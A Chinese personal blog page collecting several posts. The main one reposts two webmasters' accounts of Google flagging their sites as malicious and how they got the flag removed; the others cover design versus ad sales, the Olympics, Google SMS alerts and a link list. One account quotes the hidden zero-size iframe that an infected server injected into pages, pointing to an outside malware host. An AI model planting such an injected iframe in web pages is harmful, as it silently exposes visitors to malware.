手机浏览 RSS 2.0 订阅 膘叔的简单人生 , 腾讯云RDS购买 | 超便宜的Vultr , 注册 | 登陆
浏览模式: 标准 | 列表分类:Misc

小心网站被Google点名为有恶意软件

经常在使用gogle搜索网站的时候,可以看到某些站点下面有一行:该网站可能含有恶意代码之类的话语。但事实是不是这样呢?有人就抗议了。

原文:http://www.cnblogs.com/confach/archive/2008/04/15/1153839.html
  1. 前几天我发现我在博客园的博客被Google点名了,如下:  
  2.   
  3.     博客园-Service Is Living-文章分类-BlackBerry  
  4.     This site may harm your computer.  
  5.     摘要: 作者:Confach发表于2006-04-2822:28pm版权信息:可以任意转载,转载时请务必以超链接形式标明文章原始出处和作者信息.http://www.cnblogs.com/con... 阅读全文 ...  
  6.   
  7.   
  8. 我发现之后请求http://www.stopbadware.org review一下。www.stopbadware.org给我发过来的邮件写道(部分):  
  9.   
  10.     According to our review of your website, your site contains a potentially damaging exploit.  For example, the source code for  www.cnblogs.com/xxxx  
  11.      contains the following suspicious code:  
  12.   
  13.      </script>  
  14.     <script  
  15.     language?=?"JavaScript"  
  16.     src?=  
  17.     icon"  
  18.     type?=?"text/javascript">  
  19.     </script>  
  20.   
  21. 为了防止继续中招,所以删除了部分脚本。  
  22.   
  23. 这有点过分了。原来有个博友在我的文章下面留言了,但是该博友博客里却使用了itsun的统计脚本。而itsun估计是有恶意软件的。所以殃及了这位博友和我。我相信园子里这样的用户大有人在。  
  24.   
  25. 因此建议大家使用脚本之前,先看看是否有恶意软件。如果没有被google点名的,请检查一下你引用的脚本是否在google那里有效。  
  26. 为了解除这个,申请中。  
  27.   
  28. 本文本不应该发在首页,但个人觉得这是个非常严重的问题,如果这个问题不解决,非常影响博客园的发展。所以请dudu手下留情,暂时放在这里吧。  
  29.   
  30. 后续:已经解决了.在Google搜索结果一切都正常了.时间3天.  
开始,我以为这种事情很少见,不料看了一下回复,哇塞,原来被株连的同学那是相当的多啊。正好今天有一网友也遇到类似的事情了,就让他看了一下这个站点,还有就是如果改好了之后,怎么办,有网友就这样回复了:
原文:http://www.pin5i.com/showtopic-16950.html
  1. 向谷歌申请重新审核后网站已经恢复正常状态  
  2. 文/cobra  出处/拼吾爱程序人生  
  3.   
  4. 最近几天是痛苦的日子,网站因为服务器感染了APR局域网病毒,导致服务器上网站全部中招,表现为自动向网页里添加一行代码,在网页源码的最底部:<iframe src=http://bh.jebooo.com/3011.htm width=0 height=0></iframe>。  
  5.   
  6. 中招也就算了,问题是网站流量的重要来源谷歌具有访问网页自动识别代码的功能,结果当然是把我的网站加入到“含有恶意软件网站”的黑名单之列,我冤啦。。。  
  7.   
  8. 一时手足无措,问了些站长,没一个给出答案的,哎,只有自力更生了。尝试着登录到谷歌网站管理员页面:https://www.google.com/webmasters/tools/,我用的Adsense的帐号登录的。首先就看到了我的谷歌Sitemap,点击进去看到了该Sitemap的状态为红色异常,怎么办?想起左边导航菜单有个概述,里面应该有介绍吧,点进去看看,果然,在右边的索引状态里清楚地写到网站因为一些原因被列为非法网站,晕。还好,下面紧接着就是一段“如果要恢复网站的正常状态,就该如何如何。。。”,谷歌就是人性化,按照提示点了下面的“申请重新审核”的链接,填写了网站的基本资料(这里有个小细节,在被谷歌定义为非法网站后,必须重新验证网站的所有权后才能进行申请重新审核的步骤),确定OK。接下来,一段提示文字让我的心凉了半截:需要大概几周的时间恢复。。。  
  9.   
  10. 天啦,几周,网站的ALEXA排名会落到哪里去了,PR值就要更新了,会降吗?谷歌收录会降权吗?我心乱极了,只有找空间商出气,本来嘛,不是服务器安全措施不严格,怎么会让这样基本的ARP感染了,我恨,但无济于事,空间商的机房称这为“人力不可抗拒之意外。。。”  
  11.   
  12. 但谷歌作为互联网世界的代表公司,再一次向我证明了他的办事效率和公正性,13日下午提交的申请,14日晚上即恢复了网站的正常状态,感激之余我在想:如果空间商有如此效率,我又何必惹来这多麻烦?到这里我顿生换空间商的想法,但其实我这个人比较念旧,况且空间商已经对我作出补偿,我又怎忍心绝情离去,不过感情归感情,我已经跟空间商沟通好了,如果再有下次,对不起,换他没商量,是的,网站要发展,不能允许再频频出现这样的愚蠢的问题了!  
----END----

大量的事实证明,还是使用大公司的代码比较有保证啊。这不,膘叔就使用的是YAHOO的统计,虽然YAHOO最近不断的被人欺负,但统计功能应该还是不会受影响的吧。实在不行,以后咱就换GOOGLE的analyse。

顺便说一下,用五笔打google,出来的是:恶业胃。

Tags: 恶意软件, google, 点名, attack site, block

矛和盾[转自livid的网站]

livid认为:可能在很多国内的互联网公司都存在这样的以己之矛攻己之盾的现象, 公司里负责用户体验设计的团队一方面千方百计地设计新奇的舒适的用户体验, 而另外一方面负责销售的团队却不停地提出各种扰民的所谓广告创意, 在用户享用美好体验的同时去干扰这样的体验. 于是就看到两个团队在不停地讨价还价, 一方觉得广告的形式太恶心, 而另外一方却又始终觉得广告不够多. 而公司的管理层却因为收入方面的压力往往会站在销售团队一边. 并且很多时候他们可能并不觉得他们自己做错了什么, 因为他们觉得收入压力理所当然是第一要务, 当然要首先解决收入问题.

这样的情况很让人难受, 因为公司里面的每一个人都会觉得一切都让自己不满意. 设计师会觉得自己的想法在被扭曲, 销售团队会觉得这些设计师不食人间烟火, 管理层会觉得员工没有团队意识?

而所谓的"收入压力"这样的玩意的来源是什么呢?

在我看来恐怕是因为这家公司的这项事业在开始之前没有想清楚自己究竟要的是什么. 如果要的就是更多的钱, 那么这个世界上比互联网更靠谱的赚钱手段也不是没有. 如果要的是美好的用户体验, 那么就应该忘记广告, 让用户直接为了美好体验付钱. 比如日本最大的视频网站 ニコニコ 不就是直接向用户收费的么? 如果担心一下子从用户那里收不到太多钱, 那么就不要把摊子铺那么大, 大到最后钱也没有, 用户体验更是什么都没有了.

在过去的一年里算是见识到了相当多的莫名其妙的事情.

----END----
在自己的公司也遇到了这样的事情,只是,有些东西好象有的时候是没有办法避免的。确实是矛盾呀。
顺便介绍一下livid,此人在程序界应该算是挺有名了吧。传说他是18岁高中毕业后没读大学就直接去了易趣(不知道是否是这样),反正他最初是搞了个v2ex.com,现在的mac.6.cn就是v2ex的代码。可惜v2ex在06年左右被拔了网线,N个人表示可惜,于是现在v2ex只能留洋了。当年的事件好象挺大,先是blogbus被和谐,然后google的自定义域名。唉。一切都是这样,随便发发牢骚

Tags: livid, ue, 矛盾, 需求, 销售

今天看奥运了,东西没有写,明天补上

今天看开幕式了,不过也没有看成。开始的时候小孩一直吵。一直吵到8点半左右。等有的看的时候,就纯粹是进场了。看了3个小时的进场。除了知道一些国家的名字外,啥也没有看出来,等到快点火了,小孩又醒了。又没有的看点火了。唉。。

东西也没有写,明天补作业。

Tags: 奥运, 补作业

GOOGLE短信提醒

不得不说,有时候GOOGLE确实比较方便,在finance.google.com刚刚推出的时候,GOoGLE就推出了一个短信查询股票的功能,只是后来。。。好象改了一个很长的服务号码,就被我直接忽略掉了,实在记不住。

如今,google sms alert又推出一个比较人性化的功能,即,在aoyun期间,针对你喜欢的项目,在比赛后大约两小时内给你发送免费短信。免费的哦。你可以自由订阅,网址是:http://www.google.com/sms/alerts,可能需要你事先注册一下你的手机号,很方便。我是一下子就收到短信了。

听说这个平台是google与腾讯合作的,经常收腾讯短信的人,如果看到号码与腾讯相仿,千万不要紧张。

至于是否真的要钱,则看谷歌移动支持中心,里面有详细的解释,特别是:该服务如何收费?,当然,订阅多了的话,也需要看:我订阅了多种内容,如何管理这些短信提醒?,不过,不是每个人的手机都支持的,不过在中国应该是都可以的,比方说我的手机号码是否支持订阅?呵呵

希望aoyun期间能够收到令人振奋的消息。不过我不是很期待。。。

Tags: google, sms, alert, aoyun, olmpic games

最常用的链接

日常工作中,有一些网站是经常要去的,因此在这里加上链接,以后就可以偷懒了,而且,也防止自己以后找不到相应的网站。[逐步更新中]

PHP官方网站   PHP官方手册  PHP下载  PHP snap   pear for PHP

APACHE官方网站  APACHE手册  MYSQL官方网站  MYSQL官方中文手册

SMARTY官方网站  SMARTY手册  smarttemplate官方网站(改名叫quickskin了)

jQuery官方网站  prototype官方网站  mootools官方网站 

PYTHON官方网站  PYTHON手册


下面是系统类的链接
FREEBSD操作手册

Tags: 链接, 常用, 官方, 学习